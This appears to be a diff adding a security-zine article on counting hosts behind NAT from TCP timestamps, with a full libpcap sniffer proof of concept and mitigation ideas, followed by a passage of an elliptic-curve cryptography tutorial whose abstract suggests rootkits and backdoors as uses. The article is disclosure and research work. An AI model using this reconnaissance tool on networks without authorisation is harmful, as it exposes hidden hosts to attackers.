+|=----------=[ TCP Timestamp To count Hosts behind NAT ]=----------------=|
+|=-----------------------------------------------------------------------=|
+|=-------------=[ Elie aka Lupin (lupin@zonart.net) ]=-------------------=|
+
+Table of Contents
+*=*=*=*=*=*=*=*=*
+  
+  1.0 - Introduction 
+  2.0 - Time has something to tell us 
+     
+    - 2.1  Past history 
+    - 2.2  Present 
+    - 2.3  Back to the begin of timestamp history 
+    - 2.4  Back to school 
+    - 2.5  Back to the NAT 
+    - 2.6  Let's do PAT 
+    - 2.7  Time to fightback  
+  
+  3.0  History has something to tell us 
+     
+    - 3.1  Which class ? 
+    - 3.2  So were does it come from ? 
+    - 3.3  How do you find it ? 
+    - 3.4  Back to the future 
+  
+ - 4  Learning from the past aka conclusion 
+ - A  Acknowledgements 
+ - B  Proof of concept 
+
+
+--[ 1.0 - Introduction
+
+    This article is about TCP timestamp option. This option is used to
+offer a new way for counting host beyond a NAT and enhanced host
+fingerprinting. More deeply, this  article tries to give a new vision of a
+class of bug known has "Design error". The bug described here, deserves
+interest for the following reasons. 
+  
+ - It's new. 
+ - It affects every platform since it is related to the specification
+   rather than implementation. 
+ - It's a good way to explain how some specifications can be broken. 
+   
+    The article is organized has follow : First I will explain what's
+wrong about TCP timestamp. Then I will describe How to exploit it, the
+limitations of this exploitation and a way to avoid it. In the second part
+I will talk about the origin of this error and why it will happen again. At
+the end I will give a proof of concept and greeting as usual.
+  
+
+--[ 2.0 - Time has something to tell us
+  
+  
+----[ 2.1 - Past history
+  
+    Fingerprinting and Nat detection have been an active field for long
+time. Since you read phrack you already know the old school TCP/IP
+fingerprinting by  Fyodor. 
+
+    You may also know p0f (Passive of fingerprinting) by M. Zalewski. With
+the version 2 he has done a wonderful tool, introducing clever ways to know
+if a host uses the NAT mechanism by analyzing TCP packet option. If you are 
+interested in this tool (and you should !) read his paper :
+"Dr. Jekyll had something to Hyde"[5]. 
+
+    In fact the technique described here is related to p0f in the way, that
+like p0f, it can be totally passive. 
+
+    To be complete about NAT detection, I need to mention that AT&T has
+done research on counting host behind a NAT[1]. Their work focus on IP ID,
+assuming that this value is incremental in some OS. In fact they are mainly
+talking about Windows box which increment IP ID by 256 for each packet.
+Discovered by Antirez[7], Nmap[6] has used this fact for a long time
+(option -sI).
+
+    Now that we know what we are talking about it's time to explain what's
+going on.
+  
+
+----[ 2.2 - Present
+  
+    NAT was designed to face the IP address depletion. It is also used to
+hide multiple hosts behind a single IP. The TCP timestamp option[2] is
+improperly handled by the IP Network Address Translator (NAT) mechanism[3]. 
+ In other words even scrubbing from pf doesn't rewrite the timestamp option.
+Until now this property of the NAT has been useless (in the security point
+of view). It is interesting to point out that the timestamp option by itself
+has already been used for information disclosure.  Let's take a quick look
+at timestamp security history
+  
+
+----[ 2.3 - Back to the beginning of timestamp history
+  
+    In the past the timestamp has been used to calculate the uptime of a
+computer[4]. Any one who had try the TCP fingerprint option (-O) of Nmap
+has been impressed by a line like this one :
+            
+	"Uptime 36.027 days (since Tue May 25 11:12:31 2004)".
+    
+Of course their is no black magic behind that, only two facts : 
+  
+ - Time goes back only in movie (sorry boys...) 
+ - Every OS increments the timestamp by one every n milliseconds.  
+
+   So if you know the OS, you know how often the OS increment the timestamp
+option. All you have to do to know the uptime is to apply a trivial math
+formula :
+
+    timestamp / num inc by sec = uptime in sec 
+
+    Has you can notice this formula does not take into account the warp
+around of integer. Here we know two information : the actual timestamp and
+the number of increments by second. This can only be done because we know
+the OS type. Let's see how we can improve this technique to do it without
+knowing the OS.
+  
+
+
+----[ 2.4 - Back to school
+  
+    Remember a long time ago at school, you heard about affine function.
+A basic example of it is : 
+                
+               "y = Ax + B"
+
+where A is the slope and B the initial point. 
+The graphic representation of it is straight line. From timestamp point of
+view this can be express has the follow :
+
+                timestamp = numincbysec * sec + intial number
+  
+When you do active fingerprinting you get the timestamp and know the
+numincbysec by guessing the OS. 
+
+    Now let's suppose you can't guess the OS. In this case you don't know
+the slope and can't guess the uptime. Here is an other way to know the
+slope of the OS. You need to get the computer timestamp twice. Name it ts1
+and ts2 and name the time (in sec) where you gather it t1 and t2.  
+
+With thoses informations, it is trivial to find the slope since we have the
+following equationnal system: 
+
+               ts1 = A*s1 + B 
+               ts2 = A*s2 + B 
+
+which is solved by the following equation :
+
+           ts1 - ts2 = A*(s1 - s2) <=> A = (ts1 - ts2) / (s1 - s2) 
+   
+An imediate application of this idea can be implemented in active scanner: 
+
+    requeste twice the timestamp to verify that the slope is the
+    same as the one guessed. 
+
+This can be use to defeat some anti-fingerprint tools. It also can be used
+as a standalone fingerprinting technic but will not be accurate has the TCP
+or ICMP one.
+  
+Now that we have the theory ready, let's go back to NAT.
+
+----[ 2.5 - Back to the NAT
+   
+    Let's make the connection with the NAT. Since the timestamp option is
+not rewritten by NAT, we can count the number of host behind the NAT using
+the following algorithm :
+  
+  
+ 1. for each host already discovered verifying is the packet belong to it
+    straight line equation.  each host has a unique straight line equation
+    until two host have booted at the same second.
+   
+ 2. otherwise add the packet to unmatched packet : a new host beyond NAT is
+    detected. 
+  
+    Look to the proof of concept if you need to make things more clear.
+This simple algorithm has a lot of room for improvement. It has been keeped
+has simple has possible for clarity. As you can see timestamp option can be
+used to count host beyond a NAT in a reliable manner. It will also giveo
+indication of the OS class.
+  
+
+----[ 2.6 - Let's do PAT
+  
+    PAT (Port Address Translation) is used to provide service on a box
+behind a NAT.
+
+    The question is how do I know that the port is forwarded?
+Well timestamp is once again your friend. If for two different ports the
+slope of timestamp differs then there is a PAT and the OS of the two
+computers is different. If the timestamp gathered from the two ports does
+not belong to the same straight line, then it's the same OS but not the
+same computer.
+
+    Another interesting use of PAT is the round robin. Until now their were
+no way to know if such mechanism is used. By comparing the different
+timestamps gathered you can determine how many hosts are beyond a single
+port. This might be an interesting functionality to add to an active
+scanner.
+  
+
+----[ 2.7 - Time to fight back
+  
+    Since playing with this option can give valuable information there is
+some limitation to this technique. Mainly Windows box does not use timestamp
+option when they establish connection[8] unless you activate it. This
+limitation only affects passive analysis, if you use timestamp when
+you connect to a windows it will use it too. Moreover many tweaks software
+activate the TCP extension in windows. 
+
+    To be completed on the subject I had to mention that it seems that TCP
+extension does not exist on win 9X.
+  
+   One other problem is the time gap. In passive mode there can be a
+desynchronization between computers due to computer desynchronization or
+network lags.  In the proof of concept this phenomenon can occur. To handle
+it you need not to rely on the computer clock but on timestamp itself.
+  
+    What can we do against this ? Since no vendor except Microsoft (1)
+(Thanks Magnus) has answer to me, the following workaround may not be
+available. Here is a theoric way to patch this problem. 
+  
+ 1. Disabling tcp timestamp. This is the worse solution since we will need
+    it with fast network[2]. 
+ 2. Make NAT rewrite the timestamp and changing The NAT RFC. 
+ 3. Changing the RFC to specify that the timestamp option needs to have a
+    random increment. Modifying each implementation to reflect this change.
+    The a clean way to fix this thing because it's does not rely on an
+    external system (the NAT computer in this case). 
+  
+    Well I have to try to be as complete as possible for this technical
+part. The next part will be more "philosophic" since it deals with the
+cause instead of the consequence.
+  
+
+--[ 3 - History has something to tell us
+  
+    In this part I will try to focus on why we have this situation and what
+we can do about it. Here I am not talking about the timestamp option by
+itself but about the interaction between the timestamp option and the NAT
+mechanism.
+
+----[ 3.1 - Which class ?
+  
+    First question is what is this bug? This bug belongs to the design
+error class. To be more precise this bug exists because protocol
+specification overlap. IP was designed to be a one on one protocol: one
+client talks to one server. NAT violates this specification by allowing
+multiple to one. By itself this violation has caused so many problems that
+I lost the count of it, but it is pretty sure that the most recurrent
+problem is the FTP transfer. If you use FTP you know what I mean (other can
+look at netfilter ftp conntrack). 
+  
+
+----[ 3.2 - So were does it come from ?
+  
+    FTP problem is a good example to explain the origin of the overlap
+specification problem.  FTP was specified to work over a one to one
+reliable connexion (TCP in fact). NAT was designed to modify IP. So due to
+protocol dependency it also alter TCP and therefor FTP.
+ 
+    During NAT specification it was not taken into account that every
+protocol that relies on IP, can conflict with the modified specification.
+To tell the truth ,even if the people that design the NAT mechanism have
+ever wanted to ensure that every protocol that relies on IP can work with
+the NAT they couldn't make it.
+
+    Why ? because specification are RFC and RFC are in english. English is
+not a good way to specify things especially if you have a dependency graph
+for the specification.
+
+    For example many programming languages have formal specifications.
+Which is a more full proof way. The reason of this lack of formal
+specification resides on the history of Internet[9]. At this time writing a
+simple text was good enough. Nowadays it can be very problematic.
+  
+
+----[ 3.3 - How do you find it ?
+  
+    The big question is, how do I find this bug ?. Well I found this
+problem by formalizing a part of the TCP RFC and confronts the result of
+this analysis to real execution traces. My analyzer (2) warned me about a
+timestamp that was less than the previous one and as you know time does not
+go back...
+
+    I check out why and found this problem. What's interesting here is that
+the start point to find the bug is the specification rather than the
+implementation as it usually does to find a buffer overflow for example.
+  
+
+----[ 3.4 - Back to the future
+  
+    So from now on, what will happen ? Well more design errors will be
+found because we cannot change the past and we need to live with it. It is
+not reasonable to say that we can wipe off all that TCP stuff and start a
+new thing from scratch. Internet and network are simply too big to move
+just like that.  Just think for one second about the IP v6 deployment and
+you will be convinced. All we can do is try to be as careful as possible
+when designing a new extension or a protocol. Trying to ensure that this
+new stuff does not conflicts  with previous specification or breaks
+dependence. We can also try to formalize the protocols as much as we can to
+try and detect errors before they cause problems. Sadly patching is mainly
+our primary option for the coming years.
+  
+
+--[ 4.0 - Learning from the past aka conclusion
+
+   
+    The past tells us that protocol is not well enough specified and leads
+to errors (bug, conflict...). It may be time to change our habits and try
+something in ad equation with our time. For example to design things with
+security in mind. In this article I have tried to show you that by simply
+understanding specification and with the help of some basic math you can: 
+  
+ - Find a flaw with a worldwide impact. 
+ - Exploit this flaw in an elegant manner by the means of a simple theory. 
+ - Extend fingerprint state of art.
+ 
+   I hope this will help to convince you that theory and formal tools are a
+necessary part of the computer security field. Next time I will focus on
+simple formal method to find bug. I hope you will be here :).
+  
+
+--[ A  Acknowledgements
+
+    First I would like to thank Romain Bottier for his help and his
+patience. I also want to thank Plops and Poluc for having faith in me. See
+guys we made it!
+
+    I also want to say that I take great care about non disclosure policy.
+I have informed major vendors (Kernel.org, freeBSD, OpenBSD, Cisco...) a
+month ago. As I said I did not get any feedback so I assume they do not
+care.
+  
+
+References
+*=*=*=*=*=
+
+  
+  
+ [1]  AT&T Steven M. Bellovin. A Technique for Counting NATted Hosts 
+      http://www.research.att.com/~smb/papers/fnat.pdf
+ [2]  Jacobson, Braden, & Borman. RFC 1323 :TCP Extensions for High
+      Performance . 
+ [3]  K. Egevang, Cray Communications, P. Francis. RFC 1631 : The IP
+      Network Address Translator (NAT).  
+ [4]  Bret McDanel. TCP Timestamping - Obtaining System Uptime Remotely
+      originally posted to Bugtraq Security Mailing List on March 11, 2001. 
+ [5]  Michal Zalewski. p0f 2:Dr. Jekyll had something to Hyde. 
+ [6]  Fyodor. Nmap - Free Security Scanner For Network Exploration &
+      Security Audits. 
+ [7]  Antirez. dumbscan original BUGTRAQ posting (18 Dec 1998) 
+ [8]  Microsoft. TCP timestamp in windows : KB224829. 
+ [9]  Hafner, Katie, Matthew Lyon. Where Wizards Stay Up Late: The Origins
+      of the Internet. 
+
+FootNotes
+*=*=*=*=*=
+ 
+ (1) Microsoft point of view is that NAT is not a security mechanism so they
+     do not want to patch.
+ 
+ (2) If you are interested about my analyzer. I hope to publish soon a
+     theoric paper on how it works. I also hope to release one day a version
+     of it. To the question did I find other interesting things, the answer
+     is: maybe I need to check out more deeply.
+
+--[ B - Proof of concept
+
+
+  /*
+   * Proof Of Concept : counting host behind a NAT using timestamp
+   * To compile this file, you will need the libpcap
+   * Copyright Elie Bursztein (lupin@zonart.net)
+   * Successfully compiled on FreeBSD 5.X and Linux 2.6.X
+   *
+   * $gcc natcount.c -o natcount -I/usr/local/include -L/usr/local/lib
+   * -lpcap
+   */
+  
+  #define __USE_BSD 1
+  
+  #include <sys/time.h>
+  #include <time.h>
+  #include <netinet/in.h>
+  #include <net/ethernet.h>
+  #ifdef __FreeBSD__
+  # include <netinet/in_systm.h>
+  #endif /* __FreeBSD__ */
+  #ifdef __linux__
+  # include <linux/if_ether.h>
+  #endif /* __linux__ */
+  
+  #include <netinet/ip.h>
+  #include <stdlib.h>
+  #include <string.h>
+  #include <pcap.h>
+  #include <sys/socket.h>
+  #include <netinet/in.h>
+  #include <netinet/ip.h>
+  #include <net/if.h>
+  #include <netinet/tcp.h>
+  #include <netinet/udp.h>
+  
+  #ifdef __linux__
+  # define th_off doff
+  #endif /* __linux__ */
+  
+  u_int32_t       addr = 0;
+  
+  /* chain lists structures */
+  typedef struct listes_s {
+    struct listes_s *next;
+    void  *elt;
+  } listes_t;
+  
+  /* Structures for TCP options */
+  typedef struct { u_int32_t ts, ts_r; } timestamp_t;
+  typedef struct { timestamp_t *ts; } tcp_opt_t;
+  
+  /* Structures for datas storage */
+  typedef struct { u_int32_t from, first_timestamp; struct timeval
+first_seen; } machine_t;
+  typedef struct { u_int32_t host, nat; struct timeval first_seen; }
+nat_box_t;
+  
+  #define TIMESTAMP_ERROR_MARGIN  0.5
+  #define DELAY                   1
+  
+  /*
+   * List functions
+   */
+  int     add_in_list(listes_t **list, void * elt) {
+    listes_t *lst;
+    lst = malloc(sizeof (listes_t));
+    lst->next = *list;
+    lst->elt = elt;
+    *list = lst;
+    return (1);
+  }
+  
+  void            show_nated(listes_t *list) {
+    nat_box_t     *nat;
+    struct in_addr addr;
+    
+    printf("-- Begin of nated IP list --\n");
+    while (list)
+      {
+         nat = (nat_box_t *) list->elt;
+        if (nat->nat > 1) {
+         addr.s_addr = nat->host;
+         printf("I've guess %i computers sharing the same IP address
+(%s)\n", nat->nat, inet_ntoa(addr));
+        }
+        list = list->next;
+      }
+    printf("-- End of nated IP list --\n");
+  }
+  
+  /* 
+   * Function used to get all TCP options
+   * Simple TCP options parser
+   */
+  int             tcp_option_parser(const u_char *options,
+                                    tcp_opt_t *parsed, 
+                                    unsigned int size) {
+    u_int8_t       kind, len, i;
+    
+    bzero(parsed, sizeof(tcp_opt_t));
+    i = 0; 
+    kind = *(options + i);
+    while (kind != 0) /* EO */
+      {
+        switch (kind) {
+        case 1: i++; break; /* NOP byte */
+        case 2: i += 4; break;
+        case 3: i += 3; break;
+        case 4: i += 2; break;
+        case 5: /* skipping SACK options */
+          len = (*options + ++i) - 1;
+          i += len;
+          break;
+        case 6: i += 6; break;
+        case 7: i += 6; break;
+        case 8:
+          i += 2;
+          parsed->ts = (timestamp_t *) (options + i);
+          i += 8;
+          return (1);
+          break;
+        default:
+          i++;
+        }
+        kind = *(options + i);
+      }
+    return (0);
+  }
+  
+  /*
+   * Most interesting function ... Here we can know if a TCP packet is
+   * coming from someone we already know !
+   * Algo :
+   * finc (seconds) = current_packet_time - first_packet_time <- time
+   * between 2 packets
+   * ts_inc = inc_table[i] * finc <- our supposed timestamp increment
+   * between 2 packets
+   * new_ts = first_timestamp + ts_inc <- new = timestamp we should have
+   * now !
+   *
+   *  Now we just have to compare new_ts with current timestamp
+   *  We can authorize an error margin of 0.5%
+   *
+   * Our inc_table contain timestamp increment per second for most
+   * Operating System
+   */
+  int                     already_seen(machine_t *mach, tcp_opt_t *opt,
+struct timeval temps)
+  {
+    int                   inc_table[4] = {2, 10, 100, 1000};
+    unsigned int          new_ts;
+    float                 finc, tmp, ts_inc;
+    int                   i, diff;
+  
+    finc = ((temps.tv_sec - mach->first_seen.tv_sec) * 1000000.
+  + (temps.tv_usec - mach->first_seen.tv_usec)) / 1000000.;
+    for (i = 0; i < 4; i++) {
+      ts_inc = inc_table[i] * finc;
+      new_ts =  ts_inc + mach->first_timestamp;
+      diff = ntohl(opt->ts->ts) - new_ts;
+      if (diff == 0) { /* Perfect shoot ! */
+        return (2);
+      }
+      tmp = 100. - (new_ts * 100. / ntohl(opt->ts->ts));
+      if (tmp < 0.)
+        tmp *= -1.;
+      if (tmp <= TIMESTAMP_ERROR_MARGIN) { /* Update timestamp and time */
+        mach->first_seen = temps;
+        mach->first_timestamp = ntohl(opt->ts->ts);
+        return (1);
+      }
+    }
+    return (0);
+  }
+  
+  
+  /*
+   * Simple function to check if an IP address is already in our list
+   * If not, it's only a new connection
+   */
+  int             is_in_list(listes_t *lst, u_int32_t addr) {
+    machine_t     *mach;
+  
+    while (lst) {
+      mach = (machine_t *) lst->elt;
+      if (mach->from == addr)
+        return (1);
+      lst = lst->next;
+    }
+    return (0);
+  }
+  
+  /*
+   * This function should be call if a packet from an IP address have been
+   * found,
+   * is address is already in the list, but doesn't match any timestamp
+   * value
+   */
+  int             update_nat(listes_t *list, u_int32_t addr)
+  {
+    nat_box_t             *box;
+  
+    while (list)
+      {
+        box = (nat_box_t *) list->elt;
+        if (box->host == addr)
+          {
+            box->nat++;
+            return (1);
+          }
+        list = list->next;
+      }
+    return (0);
+  }
+  
+  int             check_host(listes_t **list, listes_t **nat, u_int32_t
+from,
+                             tcp_opt_t *opt, struct timeval temps) {
+    listes_t      *lst;
+    machine_t     *mach;
+    int           found, zaped;
+  
+    found = zaped = 0;
+  
+    lst = *list;
+    while (lst && !(found)) {
+      mach = (machine_t *) lst->elt;
+      if (mach->from == from) {
+        if ( temps.tv_sec - mach->first_seen.tv_sec > DELAY ) {
+          found = already_seen(mach, opt, temps);
+        } else zaped = 1;
+      }
+      lst = lst->next;
+    }
+    if (!(zaped) && !(found)) {
+      mach = malloc(sizeof (machine_t));
+      mach->from = from;
+      mach->first_seen = temps;
+      mach->first_timestamp = ntohl(opt->ts->ts);
+      add_in_list(list, mach);
+      update_nat(*nat, from);
+      show_nated(*nat);
+      return (1);
+    }
+    return (0);
+  }
+  
+  
+  void    callback_sniffer(u_char *useless,
+  const struct pcap_pkthdr* pkthdr,
+  const u_char *packet)
+  {
+    static listes_t               *list_machines = 0;
+    static listes_t               *list_nat = 0;
+    const struct ip               *ip_h;
+    const struct tcphdr           *tcp_h;
+    tcp_opt_t                     tcp_opt;
+    machine_t                     *mach;
+    nat_box_t                     *nat;
+    struct in_addr                my_addr;
+  
+    ip_h = (struct ip *) (packet + sizeof(struct ether_header));
+    if (ip_h->ip_p == IPPROTO_TCP)
+      {
+        tcp_h = (struct tcphdr *) (packet + sizeof(struct ether_header) +
+sizeof(struct ip));
+        if (tcp_h->th_off * 4 > 20) {
+          if (tcp_option_parser((u_char *) (packet + sizeof(struct
+ether_header)
+                                            + sizeof(struct ip) +
+sizeof(struct tcphdr)),
+                                &tcp_opt, tcp_h->th_off * 4 - 20))
+            {
+              if (is_in_list(list_machines, (ip_h->ip_src).s_addr)) {
+                check_host(&list_machines, &list_nat, (u_int32_t)
+(ip_h->ip_src).s_addr, &tcp_opt, pkthdr->ts);
+              } else {
+                if (ntohl(tcp_opt.ts->ts) != 0)
+  {
+  addr = (ip_h->ip_src).s_addr;
+  my_addr.s_addr = addr;
+  mach = malloc(sizeof (machine_t));
+  mach->from = (ip_h->ip_src).s_addr;
+  mach->first_seen = pkthdr->ts;
+  mach->first_timestamp = ntohl(tcp_opt.ts->ts);
+  nat = malloc(sizeof (nat_box_t));
+  nat->host = (u_int32_t) (ip_h->ip_src).s_addr;
+  nat->nat = 1;
+  nat->first_seen = mach->first_seen;
+  add_in_list(&list_machines, mach);
+  add_in_list(&list_nat, nat);
+  }
+  }
+            }
+        }
+      }
+  }
+  
+  
+  int             main(int ac, char *argv[])
+  {
+    pcap_t        *sniff;
+    char          errbuf[PCAP_ERRBUF_SIZE];
+    struct bpf_program fp;
+    char          *device;
+    bpf_u_int32   maskp, netp;
+    struct in_addr my_ip_addr;
+    char          filter[250];
+  
+    if (getuid() != 0) {
+      printf("You must be root to use this tool.\n");
+      exit (2);
+    }
+    if (--ac != 1)
+      {
+        printf("Usage: ./natcount xl0\n");
+        return (1);
+      }
+    device = (++argv)[0];
+    pcap_lookupnet(device, &netp, &maskp, errbuf);
+    my_ip_addr.s_addr = (u_int32_t) netp;
+    printf("Using interface %s IP : %s\n", device, inet_ntoa(my_ip_addr));
+    if ((sniff = pcap_open_live(device, BUFSIZ, 1, 1000, errbuf)) == NULL)
+{
+      printf("ERR: %s\n", errbuf);
+      exit(1);
+    }
+    bzero(filter, 250);
+    snprintf(filter, 250, "not src net %s", inet_ntoa(my_ip_addr));
+    if(pcap_compile(sniff,&fp, filter, 0, netp) == -1) {
+        fprintf(stderr,"Error calling pcap_compile\n");
+       exit(1);
+      }
+    if(pcap_setfilter(sniff,&fp) == -1) {
+        fprintf(stderr,"Error setting filter\n");
+        exit(1);
+      }
+    pcap_loop(sniff, -1, callback_sniffer, NULL);
+    return (0);
+  }
+
+
+
+
+|=-----------------------------=[ 0x03-3 ]=------------------------------=|
+|=---=[ All Hackers Need To Know About Elliptic Curve Cryptography ]=----=|
+|=-----------------------------------------------------------------------=|
+|=----------------------------=[ f86c9203 ]=-----------------------------=|
+
+
+           
+---[ Contents
+
+  0 - Abstract
+
+  1 - Algebraical Groups and Cryptography
+
+  2 - Finite Fields, Especially Binary Ones
+
+  3 - Elliptic Curves and their Group Structure
+
+  4 - On the Security of Elliptic Curve Cryptography
+
+  5 - The ECIES Public Key Encryption Scheme
+
+  6 - The XTEA Block Cipher, CBC-MAC and Davies-Meyer Hashing
+
+  7 - Putting Everything Together: The Source Code
+
+  8 - Conclusion
+
+  9 - Outlook
+
+  A - Appendix: Literature
+
+  B - Appendix: Code
+
+
+
+---[ 0 - Abstract
+
+
+Public key cryptography gained a lot of popularity since its invention
+three decades ago. Asymmetric crypto systems such as the RSA
+encryption scheme, the RSA signature scheme and the Diffie-Hellman Key
+Exchange (DH) are well studied and play a fundamental role in modern
+cryptographic protocols like PGP, SSL, TLS, SSH.
+
+The three schemes listed above work well in practice, but they still
+have a major drawback: the data structures are large, i.e. secure
+systems have to deal with up to 2048 bit long integers. These are
+easily handled by modern desktop computers; by contrast embedded
+devices, handhelds and especially smartcards reach their computing
+power limits quickly. As a second problem, of course, the
+transportation of large integers "wastes" bandwidth. In 2048 bit
+systems an RSA signature takes 256 bytes; that's quite a lot,
+especially for slow communication links.
+
+As an alternative to RSA, DH and suchlike the so called Elliptic Curve
+Cryptography (ECC) was invented in the mid-eighties. The theory behind
+it is very complicated and much more difficult than doing calculations
+on big integers. This resulted in a delayed adoption of ECC systems
+although their advantages over the classic cryptographic building
+blocks are overwhelming: key lengths and the necessary processing
+power are much smaller (secure systems start with 160 bit keys). Thus,
+whenever CPU, memory or bandwidth are premium resources, ECC is a good
+alternative to RSA and DH.
+
+This article has two purposes:
+
+1. It is an introduction to the theory of Elliptic Curve Cryptography.
+   Both, the mathematical background and the practical implementability
+   are covered.
+
+2. It provides ready-to-use source code. The C code included and
+   described in this article (about 500 lines in total) contains a
+   complete secure public key crypto system (including symmetric
+   components: a block cipher, a hash function and a MAC) and is
+   released to the public domain.
+
+   The code doesn't link against external libraries, be they of
+   bigint, cryptographic or other flavour; an available libc is
+   sufficient. This satisfies the typical hacker need for compact and
+   independent programs that have to work in "inhospitable"
+   environments; rootkits and backdoors seem to be interesting
+   applications.
+
+As mentioned above the theory behind EC cryptography is rather
+complex. To keep this article brief and readable by J. Random Hacker
+only the important results are mentioned, theorems are not proven,
+nasty details are omitted. If on the other hand you are into maths and
+want to become an ECC crack I encourage to start reading [G2ECC] or
+[ECIC].
+
+
+
+---[ 1 - Algebraical Groups and Cryptography
+
+
+Definition. A set G together with an operation G x G -> G denoted by
+'+' is called an (abelian algebraical) group if the following axioms
+hold:
+
+G1. The operation '+' is associative and commutative: 
+
+           (a + b) + c = a + (b + c)   for all a,b,c in G
+	         a + b = b + a         for all a,b in G
+
+G2. G contains a neutral element '0' such that 
+
+               a + 0 = a = 0 + a       for all a in G
+
+G3. For each element 'a' in G there exists an "inverse element",
+    denoted by '-a', such that
+                   
+                  a + (-a) = 0.
+
+For a group G the number of elements in G is called the group order, 
+denoted by |G|.
+
+
+Example. The sets Z, Q and R of integers, rational numbers and real
+numbers, respectively, form groups of infinite order in respect to
+their addition operation. The sets Q* and R* (Q and R without 0) also
+form groups in respect to multiplication (with 1 being the neutral
+element and 1/x the inverse of x).
+
+
+Definition. Let G be a group with operation '+'. A (nonempty) subset H
+of G is called a subgroup of G if H is a group in respect to the same
+operation '+'.
+
+Example. Z is a subgroup of Q is a subgroup of R in respect to '+'.
+In respect to '*' Q* is a subgroup of R*.
+
+Theorem (Lagrange). Let G be a group of finite order and H be a
+subgroup of G. Then |H| properly divides |G|. 
+
+It follows that if G has prime order, G has only two subgroups,
+namely {0} and G itself.
+
+
+We define the "scalar multiplication" of a natural number k with a
+group element g as follows:
+
+                  k * g := g + g + ... + g + g
+                           \____ k times ____/
+
+
+Theorem. For a finite group G and an element g in G the set of all
+elements k * g (k natural) forms a subgroup of G. This subgroup
+is named the "cyclic subgroup generated by g". 
+
+Thus a prime order group is generated by any of its nonzero elements.
+
+
+We now introduce the Diffie-Hellman Key Exchange protocol: let G be a
+prime order group and g a nonzero element. Let two players, called
+Alice and Bob respectively, do the following:
+
+1. Alice picks a (secret) random natural number 'a', calculates
+   P = a * g and sends P to Bob.
+
+2. Bob picks a (secret) random natural number 'b', calculates
+   Q = b * g and sends Q to Alice.
+
+3. Alice calculates S = a * Q = a * (b * g).
+
+4. Bob calculates T = b * P = b * (a * g).
+
+By definition of the scalar multiplication it is apparent that S =
+T. Therefore after step 4 Alice and Bob possess the same value S. The
+eavesdropper Eve, who recorded the exchanged messages P and Q, is able
+to calculate the same value if she manages to determine 'a' or
+'b'. This problem (calculating 'a' from G, g and 'a * g') is called
+the group's Discrete Logarithm Problem (DLP).
+
+In groups where DLP is too 'hard' to be practically solvable it is
+believed to be out of reach for eavesdroppers to determine the value
+S, hence Alice and Bob can securely establish a secret key which can
+be used to protect further communication.
+
+If an attacker is able to intercept the transmission of P and Q and to
+replace both by the group's neutral element, obviously Alice and Bob
+are forced to obtain S = 0 = T as shared key. This has to be
+considered a successful break of the crypto system. Therefore both
+Alice and Bob have to make sure that the received elements Q and P,
+respectively, indeed do generate the original group.
+
+The presented DH scheme may also serve as public key encryption scheme
+(called ElGamal encryption scheme): let Alice pick a random natural
+number 'a' as private key. The element P = a * g is the corresponding
+public key. If Bob wants to encrypt a message for her, he picks a
+random number 'b', symmetrically encrypts the message with key T = b *
+P and transmits the cipher text along with Q = b * g to Alice. She
+can reconstruct T = S via S = a * Q and then decrypt the message.
+Note the direct relationship between this and the DH scheme!
+
+Conclusion: Cryptographers are always seeking for finite prime order
+groups with hard DLP. This is where elliptic curves come into play:
+they induce algebraical groups, some of them suitable for DH and
+ElGamal crypto systems. Moreover the elliptic curve arithmetic
+(addition, inversion) is implementable in a relatively efficient way.
+
+You will find more information about groups and their properties in
+[Groups], [Lagrange], [CyclicGroups] and [GroupTheory]. Read more
+about the DLP, DH key exchange and ElGamal encryption in [DLP], [DH]
+and [ElGamal].
+
+
+
+---[ 2 - Finite Fields, Especially Binary Ones
+
+
+Definition. A set F together with two operations F x F -> F named
+'+' and '*' is called a field if the following axioms hold:
+
+F1. (F, +) forms a group
+
+F2. (F*, *) forms a group (where F* is F without the 
+    '+'-neutral element '0')
+
+F3. For all a,b,c in G the distributive law holds:
+                 
+                 a * (b + c) = (a * b) + (a * c)
+
+For 'a + (-b)' we write shorter 'a - b'. Accordingly we write 'a / b'
+when we multiply 'a' with the '*'-inverse of b.
+
+To put it clearly: a field is a structure with addition, substraction,
+multiplication and division that work the way you are familiar with.
+
+Example. The sets Q and R are fields.
+
+Theorem. For each natural m there exists a (finite) field GF(2^m) with
+exactly 2^m elements. Fields of this type are called binary fields.
+
+Elements of binary fields GF(2^m) can efficiently be represented by
+bit vectors of length m. The single bits may be understood as
+coefficients of a polynomial of degree < m. To add two field elements
+g and h just carry out the polynomial addition g + h (this means: the
+addition is done element-wise, i.e. the bit vectors are XORed
+together). The multiplication is a polynomial multiplication modulo a
+certain fixed reduction polynomial p: the elements' product is the
+remainder of the polynomial division (g * h) / p.
+
+The fact that field addition just consists of a bitwise XOR already
+indicates that in binary fields F each element is its own additive
+inverse, that is: a + a = 0 for all a in F. For a,b in F as
+consequence 2*a*b = a*b + a*b = 0 follows, what leads to the (at the
+first glance surprising) equality
+
+            (a + b)^2 = a^2 + b^2    for all a,b in F.
+
+More about finite fields and their arithmetical operations can be
+found in [FiniteField], [FieldTheory], [FieldTheoryGlossary] and
+especially [FieldArithmetic].
+
+
+
+---[ 3 - Elliptic Curves and their Group Structure
+
+
+Definition. Let F be a binary field and 'a' and 'b' elements in F.
+The set E(a, b) consisting of an element 'o' (the "point at
+infinity") plus all pairs (x, y) of elements in F that satisfy
+the equation
+
+                    y^2 + x*y = x^3 + a*x^2 + b
+
+is called the set of points of the binary elliptic curve E(a, b).
+
+
+Theorem. Let E = E(a, b) be the point set of a binary elliptic curve
+over the field F = GF(2^m). Then
+
+1. E consists of approximately 2^m elements.
+
+2. If (x, y) is a point on E (meaning x and y satisfy the above 
+   equation) then (x, y + x) is also a point on E.
+
+3. If two points P = (x1, y1) and Q = (x2, y2) on E with x1 != x2 are
+   connected by a straight line (something of the form y = m*x + b),
+   then there is exactly one third point R = (x3, y3) on E that is
+   also on this line. This induces a natural mapping f:(P, Q) -> R,
+   sometimes called chord-and-tangent mapping.
+
+Exercise. Prove the second statement.
+
+The chord-and-tangent mapping 'f' is crucial for the group structure
+given naturally on elliptic curves:
+
+a) The auxiliary element 'o' will serve as neutral element which may
+   be added to any curve point without effect.
+
+b) For each point P = (x, y) on the curve we define the point 
+   -P := (x, y + x) to be its inverse.
+
+c) For two points P = (x1, y1) and Q = (x2, y2) the sum 'P + Q'
+   is defined as -f(P, Q).
+
+It can be shown that the set E together with the point addition '+'
+and the neutral element 'o' defacto has group structure. If the
+curve's coefficients 'a' and 'b' are carefully chosen, there exist
+points on E that generate a prime order group of points for which the
+DLP is hard. Based on these groups secure crypto systems can be built.
+
+The point addition on curves over the field R can be visualized. See
